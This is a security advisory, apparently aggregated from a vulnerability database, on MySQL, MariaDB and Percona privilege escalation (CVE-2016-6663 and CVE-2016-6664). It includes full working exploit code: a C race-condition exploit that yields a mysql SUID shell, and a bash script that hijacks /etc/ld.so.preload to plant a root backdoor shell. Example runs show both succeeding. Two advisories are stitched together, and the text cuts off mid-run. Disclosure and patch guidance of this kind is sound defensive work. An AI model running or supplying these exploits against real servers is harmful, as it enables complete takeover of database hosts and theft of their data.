-------------------------

Table locations
~~~~~~~~~~~~~~~~~~

MySQL-based databases allow users with the CREATE table privilege to optionally specify the disk path of the directory where the table will be stored, via a DATA DIRECTORY parameter in the CREATE statement. Users who have access to a database account with the CREATE grant could create a table under a directory that they control.
For example:

```
attacker@debian:~$ mkdir /tmp/disktable
attacker@debian:~$ chmod 777 /tmp/disktable/
attacker@debian:~$ ls -ld /tmp/disktable/
drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/
```

A user could then place a table within the directory with the following SQL statement:

```
mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
```

which would result in creating the following table file:

```
attacker@debian:~$ ls -l /tmp/disktable/
total 0
-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD
```

Race Condition
~~~~~~~~~~~~~~~~~~

Observing the file operations performed on a table stored within the directory, it was discovered that the REPAIR TABLE SQL statement, which is available to low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe operations on temporary files created during the table repair process.

Executing the statement:

```
mysql> REPAIR TABLE `poctab1`;
+----------------+--------+----------+----------+
| Table          | Op     | Msg_type | Msg_text |
+----------------+--------+----------+----------+
| testdb.poctab1 | repair | status   | OK       |
+----------------+--------+----------+----------+
```

would result in execution of the following system calls:

```
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid 1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65
[pid 1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory)
[pid 1463] lseek(65, 0, SEEK_CUR) = 0
[pid 1463] lseek(65, 0, SEEK_END) = 0
[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0
[pid 1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66
[pid 1463] lseek(65, 0, SEEK_END) = 0
[pid 1463] lseek(64, 0, SEEK_END) = 1024
[pid 1463] close(65) = 0
[pid 1463] close(66) = 0
[pid 1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
[pid 1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid 1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
[pid 1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0
[pid 1463] unlink("/tmp/disktable/poctab1.MYD") = 0
[pid 1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0
```

The first call:

```
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
```

was found to check the file permissions of the poctab1.MYD table, which are then copied with chmod() to the newly created poctab1.TMD temporary file containing the repaired table.

The code is vulnerable to a race condition between the call:

```
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
```

and

```
[pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
```

If an attacker managed to unlink the temporary table poctab1.TMD and replace it with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), they would be able to apply arbitrary permissions on the data directory. The attacker would be able to control the set of permissions by pre-setting them on the poctab1.MYD file before executing the REPAIR TABLE statement. For example, by setting the permissions of poctab1.MYD to 777 the data directory would become readable and writable to the attacker.

Obtaining mysql-suid shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Apart from gaining access to arbitrary mysql files, the attacker could also achieve arbitrary code execution in the context of the mysql user (mysql shell). This could be done by first pre-setting permissions on poctab1.MYD to 04777 (suid), and winning the race so that the permissions get applied to a copy of a bash shell file through the vulnerable chmod() call, effectively creating a shell that elevates their permissions after execution.

There is only one problem. Their suid shell would remain owned by the attacker's user id and not the 'mysql' user. To elevate their privileges, the attacker would need to copy the bash shell to a table file owned by the mysql user. However, mysql table files are not writable by other users, making it impossible for the attacker to save the shell.

This could be bypassed if the attacker created a specially crafted directory with a group sticky bit and then created a second table named 'poctab2' as follows:

```
attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/
attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/
drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/

mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
Query OK, 0 rows affected (0.00 sec)

attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/
total 0
-rw-rw---- 1 mysql mysql    0 Oct 28 11:04 poctab1.MYD
-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD
```

As we can see, the poctab2.MYD table (thanks to the sticky bit (+s) on the permissions of the group on the disktable directory) has 'mysql' as the owner but 'attacker' as the group. Therefore, the attacker would now be able to copy /bin/bash to the poctab2.MYD file and preserve the file owner.

Finally, they could exploit the race condition again and have SUID + exec permissions applied on poctab2.MYD, which would then allow them to execute the suid shell with the elevated privileges of the mysql user.

From mysql to root
~~~~~~~~~~~~~~~~~~~~~~~~

After obtaining a mysql suid shell, attackers could then exploit one of the other MySQL vulnerabilities discovered by the author of this advisory: CVE-2016-6662 or CVE-2016-6664 (Oracle CVE-2016-5617) to escalate their privileges from the mysql user to the root system user.

V. PROOF OF CONCEPT EXPLOIT
-------------------------

------------------[ mysql-privesc-race.c ]--------------------

```
/*
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver.
1.0) CVE-2016-6663 / OCVE-2016-5616 Discovered/Coded by: Dawid Golunski dawid[at]legalhackers.com @dawid_golunski http://legalhackers.com Compile: gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient Note: * On RedHat-based systems you might need to change /tmp to another public directory * For testing purposes only. Do no harm. Full advisory URL: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html */ #include <fcntl.h> #include <grp.h> #include <mysql.h> #include <pwd.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/inotify.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define EXP_PATH "/tmp/mysql_privesc_exploit" #define EXP_DIRN "mysql_privesc_exploit" #define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" #define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" #define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" #define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary MYSQL *conn; // DB handles MYSQL_RES *res; MYSQL_ROW row; unsigned long cnt; void intro() { printf( "\033[94m\n" "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n" "mysql-privesc-race.c (ver. 1.0)\n\n" "CVE-2016-6663 / OCVE-2016-5616\n\n" "For testing purposes only. 
Do no harm.\n\n" "Discovered/Coded by:\n\n" "Dawid Golunski \n" "http://legalhackers.com" "\033[0m\n\n"); } void usage(char *argv0) { intro(); printf("Usage:\n\n%s user pass db_host database\n\n", argv0); } void mysql_cmd(char *sql_cmd, int silent) { if (!silent) { printf("%s \n", sql_cmd); } if (mysql_query(conn, sql_cmd)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } res = mysql_store_result(conn); if (res>0) mysql_free_result(res); } int main(int argc,char **argv) { int randomnum = 0; int io_notified = 0; int myd_handle; int wpid; int is_shell_suid=0; pid_t pid; int status; struct stat st; /* io notify */ int fd; int ret; char buf[4096] __attribute__((aligned(8))); int num_read; struct inotify_event *event; /* credentials */ char *user = argv[1]; char *password = argv[2]; char *db_host = argv[3]; char *database = argv[4]; // Disable buffering of stdout setvbuf(stdout, NULL, _IONBF, 0); // Get the params if (argc!=5) { usage(argv[0]); exit(1); } intro(); // Show initial privileges printf("\n[+] Starting the exploit as: \n"); system("id"); // Connect to the database server with provided credentials printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host); conn = mysql_init(NULL); if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { fprintf(stderr, "%s\n", mysql_error(conn)); exit(1); } // Prepare tmp dir printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN); umask(000); system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); system("chmod g+s /tmp/" EXP_DIRN ); // Prepare exploit tables :) printf("\n[+] Creating mysql tables \n\n"); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); // Copy /bin/bash into 
the mysql_suid_shell.MYD mysql table file // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n"); system("cp /bin/bash " SUID_SHELL); system("ls -l " SUID_SHELL); // Use inotify to get the timing right fd = inotify_init(); if (fd < 0) { printf("failed to inotify_init\n"); return -1; } ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ printf("\n[+] Entering the race loop... Hang in there...\n"); while ( is_shell_suid != 1 ) { cnt++; if ( (cnt % 100) == 0 ) { printf("->"); //fflush(stdout); } /* Create empty file , remove if already exists */ unlink(MYSQL_TEMP_FILE); unlink(MYSQL_TAB_FILE); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); /* random num if needed */ srand ( time(NULL) ); randomnum = ( rand() % MAX_DELAY ); // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink pid = fork(); if (pid < 0) { fprintf(stderr, "Fork failed :(\n"); } /* Child process - executes REPAIR TABLE SQL statement */ if (pid == 0) { usleep(500); unlink(MYSQL_TEMP_FILE); mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); // child stops here exit(0); } /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ if (pid > 0 ) { io_notified = 0; while (1) { int processed = 0; ret = read(fd, buf, sizeof(buf)); if (ret < 0) { break; } while (processed < ret) { event = (struct inotify_event *)(buf + processed); if (event->mask & IN_CLOSE) { if (!strcmp(event->name, "exploit_table.TMD")) { //usleep(randomnum); // Set the .MYD permissions to suid+exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE); 
myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); close(myd_handle); chmod(MYSQL_TAB_FILE, 04777); // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec unlink(MYSQL_TEMP_FILE); symlink(SUID_SHELL, MYSQL_TEMP_FILE); io_notified=1; } } processed += sizeof(struct inotify_event); } if (io_notified) { break; } } waitpid(pid, &status, 0); } // Check if SUID bit was set at the end of this attempt if ( lstat(SUID_SHELL, &st) == 0 ) { if (st.st_mode & S_ISUID) { is_shell_suid = 1; } } } printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt); system("ls -l " SUID_SHELL); printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n"); system(SUID_SHELL " -p -i "); //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); /* close MySQL connection and exit */ printf("\n[+] Job done. Exiting\n\n"); mysql_close(conn); return 0; } ``` Example run: ~~~~~~~~~~~~~~ ``` attacker@xenial:~/mysql-exploit$ lsb_release -a No LSB modules are available. 
Distributor ID: Ubuntu Description: Ubuntu 16.04.1 LTS Release: 16.04 Codename: xenial attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv ii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries ii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files attacker@xenial:~/mysql-exploit$ id uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' +-----------------------------------------------------------------------------------------------------------------+ | Grants for attacker@localhost | +-----------------------------------------------------------------------------------------------------------------+ | GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | | GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | +-----------------------------------------------------------------------------------------------------------------+ attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 For testing purposes only. Do no harm. 
Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Starting the exploit as: uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) [+] Connecting to the database `pocdb` as attacker@localhost [+] Creating exploit temp directory /tmp/mysql_privesc_exploit [+] Creating mysql tables DROP TABLE IF EXISTS exploit_table DROP TABLE IF EXISTS mysql_suid_shell CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' [+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : -rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Entering the race loop... Hang in there... [+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: -rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD [+] Spawning the mysql SUID shell now... Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) mysql_suid_shell.MYD-4.3$ whoami mysql mysql_suid_shell.MYD-4.3$ id uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* -rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm -rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD -rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI mysql_suid_shell.MYD-4.3$ exit exit [+] Job done. Exiting real 0m28.999s user 0m0.016s sys 0m0.016s ``` Video PoC: ~~~~~~~~~~~~ http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. 
BUSINESS IMPACT
-------------------------

Malicious local users with DB access granted a common set of privileges (SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary code and escalate their privileges to the mysql system user. This would allow them to gain access to all of the databases stored on the server, as well as exploit the CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges to the root system user (rootshell) and fully compromise the target server.

This vulnerability could, for example, be exploited by malicious users in a shared hosting environment where each user is supposed to have access to only one database assigned to them. It could also be exploited by attackers who have managed to find a vulnerability in a website and gained access to the target system as a low-privileged user (such as apache/www-data).

VII. SYSTEMS AFFECTED
-------------------------

MariaDB
  < 5.5.52
  < 10.1.18
  < 10.0.28

MySQL
  <= 5.5.51
  <= 5.6.32
  <= 5.7.14

Percona Server
  < 5.5.51-38.2
  < 5.6.32-78-1
  < 5.7.14-8

Percona XtraDB Cluster
  < 5.6.32-25.17
  < 5.7.14-26.17
  < 5.5.41-37.0

When checking if your system contains the patches, note that this vulnerability has been known under two CVE IDs:

CVE-2016-6663
CVE-2016-5616

CVE-2016-6663 is the original CVE that was agreed to be used by all the affected vendors. The issue was, however, mistakenly mentioned in the Oracle CPU under a new CVE, CVE-2016-5616, resulting in a duplicate. Oracle has advised that the CPU will be updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663.

VIII. SOLUTION
-------------------------

MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in advance, which allowed them to produce patches for this vulnerability before disclosure.

Update to security releases issued by the vendor.

As a temporary mitigation, you can disable symbolic link support in the database server configuration with the following my.cnf config setting:

symbolic-links = 0

Nevertheless, an update to a patched release is recommended.

IX. REFERENCES
-------------------------

http://legalhackers.com

This advisory (CVE-2016-6663 / OCVE-2016-5616):
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html

Exploit (mysql-privesc-race.c) source code URL:
http://legalhackers.com/exploits/mysql-privesc-race.c

Video PoC:
http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html

Advisory for CVE-2016-6664 / OCVE-2016-5617:
http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html

Vendor updates:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL
http://www.mysql.com/
https://mariadb.org/about/
https://mariadb.com/kb/en/mdb-5552-rn/
https://mariadb.com/kb/en/mdb-10118-rn/
https://mariadb.com/kb/en/mdb-10028-rn/
https://www.percona.com/software

X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com

XI. REVISION HISTORY
-------------------------

01.11.2016 - Advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

id SSV:92510
last seen 2017-11-19
modified 2016-11-02
published 2016-11-02
reporter Root
source https://www.seebug.org/vuldb/ssvid-92510
title MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition Vulnerability (CVE-2016-6663)

bulletinFamily exploit
description

I. VULNERABILITY
-------------------------

MySQL / MariaDB / PerconaDB - Root Privilege Escalation

MySQL
  <= 5.5.51
  <= 5.6.32
  <= 5.7.14

MariaDB
  All current

Percona Server
  < 5.5.51-38.2
  < 5.6.32-78-1
  < 5.7.14-8

Percona XtraDB Cluster
  < 5.6.32-25.17
  < 5.7.14-26.17
  < 5.5.41-37.0

II. BACKGROUND
-------------------------

MySQL:

"MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications."

"Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software."

http://www.mysql.com/products/
http://www.mysql.com/why-mysql/

--

MariaDB:

"MariaDB is one of the most popular database servers in the world. It's made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases."

https://mariadb.org/about/

--

PerconaDB:

"Percona Server for MySQL is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server's self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability."

https://www.percona.com/software/mysql-database/percona-server

III.
INTRODUCTION
-------------------------

MySQL-based databases including MySQL, MariaDB and PerconaDB are affected by a privilege escalation vulnerability which can let attackers who have gained access to the mysql system user further escalate their privileges to the root user, allowing them to fully compromise the system. The vulnerability stems from unsafe file handling of error logs and other files.

IV. DESCRIPTION
-------------------------

The error.log file on most default installations of MySQL/PerconaDB/MariaDB databases is stored either in the /var/log/mysql or the /var/lib/mysql directory.

The permissions on the file and directory look as follows:

```
root@trusty:/var/lib/mysql# ls -la /var/log/mysql
total 468
drwxr-s---  2 mysql adm    4096 Sep 11 06:25 .
drwxrwxr-x 36 root  syslog 4096 Sep 11 06:25 ..
-rw-r-----  1 mysql adm       0 Sep 11 06:25 error.log

root@trusty:/var/lib/mysql# ls -lad /var/log/mysql
drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql
```

The mysqld_safe wrapper that is normally used for starting the MySQL daemon and creating/reopening the error.log performs certain unsafe file operations that may allow attackers to gain root privileges.

The wrapper script contains a 'while' loop, shown below, which monitors the mysqld process and performs a restart in case of process failure. The restart involves re-creation of the error.log file if syslog logging has not been configured instead of error log files (file-based logging is the default setting on most installations).

--------[ mysqld_safe ]--------
```
[...]
while true
do
  rm -f "$pid_file"                 # Some extra safety

  start_time=`date +%M%S`

  eval_log_error "$cmd"

  if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then
    touch "$err_log"                # hypothetical: log was renamed but not
    chown $user "$err_log"          # flushed yet. we'd recreate it with
    chmod "$fmode" "$err_log"       # wrong owner next time we log, so set
  fi                                # it up correctly while we can!
[...]
```
-------------------------------

As can be seen, the error.log file is created (touch) and chowned to the user running the mysqld daemon (typically 'mysql'). The operation is vulnerable to a symlink attack.

Attackers who obtained access to the mysql account, through the CVE-2016-6663 vulnerability described at:

http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html

would gain access to the /var/log or /var/lib/mysql directories (owned by the mysql user) and could therefore easily remove the error.log file and replace it with a symlink to an arbitrary system file and escalate privileges.

The privilege escalation could be triggered instantly (without the need to wait for a mysql service restart/reboot) by attackers having the 'mysql' account by simply killing the mysqld child process (launched by the mysqld_safe wrapper). When the mysqld process gets terminated, the wrapper will re-iterate the loop shown above and immediately create a mysql-owned file in the location specified by the attacker in the symlink, thus allowing attackers to quickly escalate their privileges.

V. PROOF OF CONCEPT EXPLOIT
-------------------------

-------[ mysql-chowned.sh ]------
```
#!/bin/bash -p
#
# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
# mysql-chowned.sh (ver. 1.0)
#
# CVE-2016-6664 / OCVE-2016-5617
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# This PoC exploit allows attackers to (instantly) escalate their privileges
# from mysql system account to root through unsafe error log handling.
# The exploit requires that file-based logging has been configured (default).
# To confirm that syslog logging has not been enabled instead use:
# grep -r syslog /etc/mysql
# which should return no results.
# # This exploit can be chained with the following vulnerability: # CVE-2016-6663 / OCVE-2016-5616 # which allows attackers to gain access to mysql system account (mysql shell). # # In case database server has been configured with syslog you may also use: # CVE-2016-6662 as an alternative to this exploit. # # Usage: # ./mysql-chowned.sh path_to_error.log # # # See the full advisory for details at: # https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html # # Video PoC: # https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/mysqlrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0 } #intro echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" id | grep -q mysql if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] 
The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi echo -e "\n[+] Target MySQL log file set to $ERRORLOG" # [ Active exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); //unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file to /etc rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" # Wait for MySQL to re-open the logs echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER if [ "$THE_ANSWER" = "y" ]; then echo -e "Got it. Executing 'killall mysqld' now..." 
    killall mysqld
fi

while :; do
    sleep 0.1
    if [ -f /etc/ld.so.preload ]; then
        echo $PRIVESCLIB > /etc/ld.so.preload
        rm -f $ERRORLOG
        break;
    fi
done

# /etc/ dir should be owned by mysql user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null

#while :; do
#    sleep 0.1
#    ps aux | grep mysqld | grep -q 'log-error'
#    if [ $? -eq 0 ]; then
#        break;
#    fi
#done

# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
    echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
else
    echo -e "\n[!] Failed to get root"
    cleanexit 2
fi

# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p

# Job done.
cleanexit 0
```

------------EOF------------------

Example run
~~~~~~~~~~~~~~~~

```
mysql_suid_shell.MYD-4.3$ whoami
mysql

omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server
iU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server
iF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries

mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err

MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
mysql-chowned.sh (ver. 1.0)

CVE-2016-6664 / OCVE-2016-5617

Discovered and coded by:

Dawid Golunski
http://legalhackers.com

[+] Starting the exploit as
uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)

[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err

